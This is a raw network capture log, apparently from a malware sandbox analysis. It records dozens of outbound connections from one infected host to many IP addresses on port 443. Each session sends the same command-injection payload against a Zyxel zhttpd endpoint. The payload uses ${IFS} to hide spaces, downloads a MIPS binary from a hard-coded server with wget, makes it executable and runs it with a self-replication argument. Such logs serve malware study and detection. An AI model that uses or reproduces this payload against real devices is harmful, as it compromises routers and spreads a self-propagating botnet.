                                            Jan 14, 2024 15:50:38.395721912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4017192.168.2.2355922223.254.191.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395764112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4018192.168.2.2340594172.103.132.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395804882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4019192.168.2.2343146204.190.63.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395823002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4020192.168.2.2359598128.178.124.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395852089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4021192.168.2.2334970110.190.94.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395900011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4022192.168.2.234900270.199.80.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395922899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4023192.168.2.2351392105.160.255.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395931005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4024192.168.2.233367051.49.234.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.395991087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4025192.168.2.235278457.20.161.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396015882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4026192.168.2.2348874131.148.83.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396038055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4027192.168.2.234947243.175.195.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396078110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4028192.168.2.2355788155.174.138.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396081924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4029192.168.2.233837237.154.168.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396111965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4030192.168.2.233471241.57.89.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396143913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4031192.168.2.233940012.16.202.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396167040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4032192.168.2.235204639.66.108.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396188974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4033192.168.2.2345520131.181.217.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396228075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4034192.168.2.2358508202.75.174.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396246910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4035192.168.2.2353814164.229.111.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396317959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4036192.168.2.2346464223.191.251.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396327019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4037192.168.2.233888688.163.97.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396393061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4038192.168.2.2341850131.246.233.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396414042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4039192.168.2.2350164185.172.183.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396429062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4040192.168.2.2340436189.159.243.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396477938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4041192.168.2.235427877.152.193.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396483898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4042192.168.2.2338764104.230.116.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396534920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4043192.168.2.2356982112.160.254.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396578074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4044192.168.2.2341286135.88.70.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396600962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4045192.168.2.2333432140.176.4.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396644115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4046192.168.2.233880437.159.133.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396727085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4047192.168.2.235938443.183.10.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396745920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4048192.168.2.2352232218.61.247.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396773100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4049192.168.2.2359964212.254.157.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396811008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4050192.168.2.2359750121.122.58.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396835089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4051192.168.2.2358556106.186.222.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396861076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4052192.168.2.2347322139.43.22.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396898985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4053192.168.2.2347022124.215.220.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396928072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4054192.168.2.235513668.221.17.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396949053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4055192.168.2.2356994126.171.205.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.396982908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4056192.168.2.2337302117.32.63.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397006035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4057192.168.2.2341166221.116.115.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397031069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4058192.168.2.233476682.198.154.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397079945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4059192.168.2.2348850131.214.204.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397111893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4060192.168.2.234906424.29.50.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397121906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4061192.168.2.2343520197.222.158.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397165060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4062192.168.2.2352332103.254.81.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397206068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4063192.168.2.235187889.96.109.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397228956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4064192.168.2.2337052177.83.94.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397268057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4065192.168.2.234810698.101.155.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397289991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4066192.168.2.235837072.47.41.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397306919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4067192.168.2.2350726188.246.247.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397357941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4068192.168.2.2335118111.242.206.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397382021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4069192.168.2.2338116175.47.75.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397418022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4070192.168.2.234310253.57.236.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397440910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4071192.168.2.234743225.94.155.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397463083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4072192.168.2.234325818.179.252.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397480011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4073192.168.2.235966871.152.84.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397505045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4074192.168.2.234325296.96.113.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397545099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4075192.168.2.2335906213.9.174.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397563934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4076192.168.2.234062024.105.16.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397599936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4077192.168.2.235987664.28.224.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397619009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4078192.168.2.2356246146.246.54.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:38.397644043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4079192.168.2.2342560176.193.49.218443
                                            TimestampBytes transferredDirectionData
